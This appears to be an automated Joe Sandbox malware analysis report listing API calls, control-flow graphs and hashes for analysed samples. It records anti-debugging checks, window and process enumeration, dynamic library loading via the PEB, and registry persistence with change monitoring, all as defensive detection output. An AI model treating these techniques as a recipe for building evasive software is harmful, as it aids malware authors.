                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Globalclosesocket$AllocCountExchangeFreeInterlockedTickhtonsrecvsendsocket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1332007968-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2cd925990b49803025ce91d6aaf0fb884d1ce786d7d10ea681be8632e28d4c02
                                                                                                                                                                                                                                                                                            • Instruction ID: 8e1de89db32fbcf1f08d7eb1d72327fc1dee72a53dfdac9da43f39eb872c9f96
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cd925990b49803025ce91d6aaf0fb884d1ce786d7d10ea681be8632e28d4c02
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF217171D002199BEB60DB78CC06BEDB7B4BF58300F0446AAE20DE62E1EB754A55DF51
                                                                                                                                                                                                                                                                                            Function 014345D2 Relevance: 6.0, APIs: 4, Instructions: 35fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 014345E3
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 014345FC
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0143461D
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 01434627
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$CloseCreateDeleteHandleWrite
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 656945655-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 313f6ee34da1165183b1406063ef831325b12263d778149e7355238c417cee94
                                                                                                                                                                                                                                                                                            • Instruction ID: 3e6a06b73978de91d64059b966b28f8d0919d1e2c32993b429f94dcd628affe6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 313f6ee34da1165183b1406063ef831325b12263d778149e7355238c417cee94
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DF0F979640308FBDB20DFA4DC4DF9EBB78AB4DB11F108644FB05AB2D4D674AA448B90
                                                                                                                                                                                                                                                                                            Function 01437FA9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 014380DA
                                                                                                                                                                                                                                                                                            • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 014380F5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: recvselect
                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                            • API String ID: 741273618-2766056989
                                                                                                                                                                                                                                                                                            • Opcode ID: e6f446bafcb95174e754699b5b4cd8f241692154314fb655b45f77f516336076
                                                                                                                                                                                                                                                                                            • Instruction ID: 5fcbc5d5a54a32df17b6c8308d6099b796610362a3d3ddb3b9150f03c55dbc82
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6f446bafcb95174e754699b5b4cd8f241692154314fb655b45f77f516336076
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7412FB0A0021D9BDB19CF58C8517DEF7B5EF98304F00819AE60967290D7B56EC0CF91
                                                                                                                                                                                                                                                                                            Function 0143511E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01435153
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 0143518F
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000400), ref: 014351D1
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0143543A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: QueryValue$Closewsprintf
                                                                                                                                                                                                                                                                                            • String ID: userC:\Windows\
                                                                                                                                                                                                                                                                                            • API String ID: 3301640424-3509716881
                                                                                                                                                                                                                                                                                            • Opcode ID: 76e558de3b1a7c58c9e26562acfeef9ba75d2e4df4147cd543759abf866539cb
                                                                                                                                                                                                                                                                                            • Instruction ID: bb217cf1dede78e1640abcbe0ebf1ee59eeb6c34c8e42bfccf54894c80de3ddb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76e558de3b1a7c58c9e26562acfeef9ba75d2e4df4147cd543759abf866539cb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70F049719011289BEB30CF14CD80FEAF378FB98705F0842DAE629A6154C7329B98CF54

                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                            Execution Coverage:55.9%
                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                                                                            Total number of Nodes:199
                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:9
                                                                                                                                                                                                                                                                                            execution_graph 561 976096 574 975307 561->574 563 9760a1 577 97149b 563->577 568 9760b6 583 9757f2 568->583 573 9760da 612 97538c 573->612 617 97157d 574->617 576 975316 VirtualAlloc 576->563 578 97157d 4 API calls 577->578 579 9714aa 578->579 579->573 580 972df8 579->580 642 971e4d 580->642 584 97157d 4 API calls 583->584 585 97580c 584->585 586 97157d 4 API calls 585->586 587 975820 586->587 588 97157d 4 API calls 587->588 592 975854 587->592 590 975840 GetTokenInformation 588->590 590->592 591 975868 593 975fa8 591->593 592->591 645 972371 592->645 648 9761f3 593->648 596 975fdb 597 97157d 4 API calls 596->597 599 975fed RegOpenKeyExW 597->599 600 976007 599->600 601 976030 599->601 602 97157d 4 API calls 600->602 601->573 603 976012 602->603 604 976021 603->604 605 976039 603->605 606 97157d 4 API calls 604->606 607 97157d 4 API calls 605->607 606->601 609 976049 607->609 608 97604b RegNotifyChangeKeyValue 608->609 609->608 611 97157d GetPEB LoadLibraryA VirtualAlloc VirtualFree 609->611 676 9760ec 609->676 611->609 613 975395 612->613 614 9753af 612->614 615 97157d 3 API calls 613->615 616 9753a1 VirtualFree 615->616 616->614 618 971d45 617->618 619 971d56 617->619 620 971d58 618->620 621 971d4c 618->621 622 97538c 4 API calls 619->622 628 971e6e 620->628 636 9714ba GetPEB 621->636 626 971dba 622->626 626->576 638 975353 628->638 630 971da8 631 9714fc 630->631 632 9714ba GetPEB 631->632 633 97150d 632->633 634 97155c 633->634 635 971573 LoadLibraryA 633->635 634->619 635->634 637 9714cd 636->637 637->619 639 97157d 3 API calls 638->639 640 975363 VirtualAlloc 639->640 641 97537a 640->641 641->630 643 975353 4 API calls 642->643 644 971e5e 643->644 644->568 646 97157d 4 API calls 645->646 647 972380 CloseHandle 646->647 647->591 649 97157d 4 API calls 648->649 650 976219 RegOpenKeyExW 649->650 651 97622f 650->651 652 975fc0 650->652 653 975307 5 API calls 651->653 652->596 664 976335 652->664 654 976236 653->654 655 97157d 4 API calls 654->655 656 976249 RegQueryValueExW 655->656 657 976262 656->657 660 97626b 656->660 679 976437 657->679 659 97538c 4 API calls 661 976284 659->661 660->659 662 97157d 4 API calls 661->662 663 976295 RegCloseKey 662->663 663->652 665 97157d 4 API calls 664->665 666 976346 RegOpenKeyExW 665->666 667 976361 666->667 668 976390 666->668 672 9760ec 5 API calls 667->672 669 97157d 4 API calls 668->669 670 97639c RegCreateKeyExW 669->670 670->667 671 9763b8 670->671 671->596 673 976377 672->673 674 97157d 4 API calls 673->674 675 976386 RegCloseKey 674->675 675->671 677 97157d 4 API calls 676->677 678 9760fb RegSetValueExW 677->678 678->609 680 97157d 4 API calls 679->680 681 976446 680->681 681->660 682 97130d 703 971000 682->703 685 971495 689 97157d GetPEB LoadLibraryA VirtualAlloc VirtualFree 699 97132c 689->699 691 97157d 4 API calls 693 9713dc CheckRemoteDebuggerPresent 691->693 692 97157d 4 API calls 694 971441 EnumWindows 692->694 693->699 753 9761cf 694->753 790 971081 694->790 697 97157d 4 API calls 698 971463 Sleep 697->698 698->699 699->689 699->691 699->692 700 97157d 4 API calls 699->700 727 975870 699->727 736 971139 699->736 741 9711d6 699->741 701 971402 Sleep 700->701 702 97157d 4 API calls 701->702 702->699 757 9729e2 703->757 708 97157d 4 API calls 709 971023 RegOpenKeyExW 708->709 710 971040 709->710 712 97103c 709->712 763 9762a1 710->763 713 97538c 4 API calls 712->713 714 97106b 713->714 715 97538c 4 API calls 714->715 716 971071 715->716 717 97538c 4 API calls 716->717 718 971077 717->718 718->685 719 9712b2 718->719 720 975307 5 API calls 719->720 721 9712bd 720->721 722 97149b 4 API calls 721->722 726 9712c5 722->726 723 97538c 4 API calls 724 971308 723->724 724->699 725 9712e6 725->699 726->723 726->725 728 97157d 4 API calls 727->728 729 975889 CreateToolhelp32Snapshot 728->729 734 975897 729->734 735 97589b 729->735 730 97157d 4 API calls 731 9758ca Process32FirstW 730->731 732 9758da 731->732 731->735 733 972371 5 API calls 732->733 733->734 734->699 735->730 735->732 738 9711a5 736->738 737 97157d 4 API calls 737->738 738->737 740 9711cb 738->740 775 9758eb 738->775 740->699 742 9711e3 741->742 743 97157d 4 API calls 742->743 744 97122d QueryDosDeviceW 743->744 745 971243 744->745 746 9712a9 744->746 747 975307 5 API calls 745->747 746->699 752 97124e 747->752 748 9712a1 749 97538c 4 API calls 748->749 749->746 750 97157d 4 API calls 751 97126a QueryDosDeviceW 750->751 751->752 752->748 752->750 754 9761d5 753->754 784 976111 754->784 758 971e4d 4 API calls 757->758 759 97100e 758->759 760 972bd5 759->760 761 971e4d 4 API calls 760->761 762 971015 761->762 762->708 764 97157d 4 API calls 763->764 765 9762ca RegQueryValueExW 764->765 766 9762df 765->766 774 976319 765->774 768 975307 5 API calls 766->768 767 97157d 4 API calls 769 976328 RegCloseKey 767->769 770 9762e9 768->770 769->712 771 97157d 4 API calls 770->771 772 9762f9 771->772 773 97538c 4 API calls 772->773 772->774 773->774 774->767 776 97157d 4 API calls 775->776 777 975904 CreateToolhelp32Snapshot 776->777 781 975918 777->781 783 975914 777->783 778 97157d 4 API calls 779 975947 Module32FirstW 778->779 780 975957 779->780 779->781 782 972371 5 API calls 780->782 781->778 781->780 782->783 783->738 785 971459 784->785 787 97611e 784->787 785->697 786 97157d 4 API calls 786->787 787->786 788 97157d 4 API calls 787->788 789 976141 Sleep 788->789 789->785 789->787 791 975307 5 API calls 790->791 792 9710df 791->792 793 97157d 4 API calls 792->793 797 9710ed 793->797 794 97112a 795 97538c 4 API calls 794->795 796 971131 795->796 797->794 798 97157d 4 API calls 797->798 798->797

                                                                                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            • Opacity -> Relevance
                                                                                                                                                                                                                                                                                            • Disassembly available
                                                                                                                                                                                                                                                                                            callgraph 0 Function_00976096 5 Function_0097149B 0->5 6 Function_00975307 0->6 12 Function_0097538C 0->12 30 Function_00975FA8 0->30 38 Function_00971FD0 0->38 46 Function_009757F2 0->46 51 Function_00972DF8 0->51 1 Function_00976413 8 Function_00976402 1->8 2 Function_00976111 49 Function_0097157D 2->49 3 Function_00976690 4 Function_00D44058 58 Function_00D441A8 4->58 5->49 6->49 7 Function_00971F03 7->1 9 Function_00971081 9->6 9->12 13 Function_00971E8C 9->13 9->49 10 Function_00971000 10->7 10->8 10->12 26 Function_009762A1 10->26 33 Function_00972BD5 10->33 10->49 53 Function_009729E2 10->53 11 Function_0097130D 11->9 11->10 20 Function_009712B2 11->20 24 Function_00971139 11->24 32 Function_009711D6 11->32 41 Function_009761CF 11->41 48 Function_00975870 11->48 11->49 12->49 13->8 37 Function_00976452 13->37 14 Function_00976437 14->49 15 Function_00A00000 16 Function_00A10000 17 Function_00976335 17->1 17->49 56 Function_009760EC 17->56 18 Function_00A20000 19 Function_00A40000 20->1 20->5 20->6 20->12 20->38 21 Function_00A50000 22 Function_009714BA 22->7 22->37 23 Function_00AD0000 24->49 57 Function_009758EB 24->57 25 Function_00AE0000 26->6 26->12 26->49 27 Function_00BA0000 28 Function_00BC0000 29 Function_00971EAA 29->8 30->1 30->17 45 Function_009761F3 30->45 30->49 30->56 31 Function_00975328 32->1 32->3 32->6 32->12 32->29 32->49 43 Function_00971E4D 33->43 34 Function_00971ED5 35 Function_00975353 35->31 35->49 36 Function_009EA4DA 37->1 37->8 38->8 39 Function_009EA4D5 39->36 40 Function_00D10000 41->2 42 Function_00B0CF69 42->39 43->35 44 Function_00DB0000 45->6 45->12 45->14 45->49 47 Function_00972371 46->47 46->49 47->49 48->13 48->47 48->49 49->12 49->22 49->34 50 Function_009714FC 49->50 55 Function_00971E6E 49->55 50->22 50->34 51->43 52 Function_00F40000 53->43 54 Function_00F50000 55->35 56->49 57->13 57->47 57->49

                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                            Function 00976111 Relevance: 1.3, APIs: 1, Instructions: 68sleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 284 976111-97611c 285 976154-9761ce 284->285 286 97611e 284->286 287 976123-976152 call 97157d * 2 Sleep 286->287 287->285
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8291e7eba025b2cabe6cb1a418f1368c971f54f357b78bae2338faacba5cf7b6
                                                                                                                                                                                                                                                                                            • Instruction ID: 0aafcfac7871cd65317dfac5908e8e96c147f5a193059b9ffdc168e1f29481ea
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8291e7eba025b2cabe6cb1a418f1368c971f54f357b78bae2338faacba5cf7b6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41110473A146114BFB1CDF25EC4A9667392EBD435031A403FE62A9B395CEB06943D780
                                                                                                                                                                                                                                                                                            Function 0097130D Relevance: 6.1, APIs: 4, Instructions: 123sleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00971000: RegOpenKeyExW.KERNEL32(80000001,00000000,00000000,00020019,00971318,?,?,?,?,?,00971318), ref: 00971036
                                                                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNEL32(00000009,?), ref: 009713E5
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00971409
                                                                                                                                                                                                                                                                                            • EnumWindows.USER32(00971081,00000000), ref: 0097144A
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00971468
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep$CheckDebuggerEnumOpenPresentRemoteWindows
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3279035243-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d8cdb8aa33a0326ddc6771819b4584f6d3819c0c9449abd34a97ca28b4402c07
                                                                                                                                                                                                                                                                                            • Instruction ID: 4ad712cba2ef12f057bcbc4da2991d8e37ae521631d5d65ecd6053a98a191dce
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8cdb8aa33a0326ddc6771819b4584f6d3819c0c9449abd34a97ca28b4402c07
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04318673C04309AFEF14AFE8DC46BADBB78EF80314F608459F4196A192DB759A81CB54
                                                                                                                                                                                                                                                                                            Function 009711D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 83 9711d6-971241 call 976690 call 97157d QueryDosDeviceW 88 971243-971260 call 975307 83->88 89 9712aa-9712b1 83->89 92 971262-971275 call 97157d QueryDosDeviceW 88->92 93 9712a1-9712a4 call 97538c 88->93 98 971277-97127e call 971eaa 92->98 99 971290-97129f call 976413 92->99 96 9712a9 93->96 96->89 104 971280-971284 98->104 99->92 99->93 105 971286 104->105 106 97128a-97128e 104->106 105->106 106->99 106->104
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • QueryDosDeviceW.KERNEL32(00000000,?,00020000,0F4D8B55,2FA62CA8), ref: 0097123D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00975307: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,009760A1,00000104), ref: 00975324
                                                                                                                                                                                                                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000104), ref: 00971271
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: DeviceQuery$AllocVirtual
                                                                                                                                                                                                                                                                                            • String ID: ^;yN
                                                                                                                                                                                                                                                                                            • API String ID: 1362681402-1295057876
                                                                                                                                                                                                                                                                                            • Opcode ID: 0bc3cb7fd173ad837db7d36987d4d99e37398282e0fa367c0b50b7a074e2e6bf
                                                                                                                                                                                                                                                                                            • Instruction ID: 84024afbc33304064131bafe0353e31bf9febf79029d199453c95854b5b5309f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bc3cb7fd173ad837db7d36987d4d99e37398282e0fa367c0b50b7a074e2e6bf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4621C9329043186BEB159B98D8427EEBBB8DF80710F108099E10DB6182DBB59BC5CBE5
                                                                                                                                                                                                                                                                                            Function 009761F3 Relevance: 4.6, APIs: 3, Instructions: 70registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 107 9761f3-97622d call 97157d RegOpenKeyExW 110 97622f-976260 call 975307 call 97157d RegQueryValueExW 107->110 111 97629b-9762a0 107->111 116 976275-976278 110->116 117 976262-97626f call 976437 110->117 119 97627e-97629a call 97538c call 97157d RegCloseKey 116->119 120 97627a 116->120 117->119 123 976271 117->123 119->111 120->119 123->116
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 00976229
                                                                                                                                                                                                                                                                                              • Part of subcall function 00975307: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,009760A1,00000104), ref: 00975324
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNEL32(?,00000001,00000000,00000001,00000000,?,00000000), ref: 0097625A
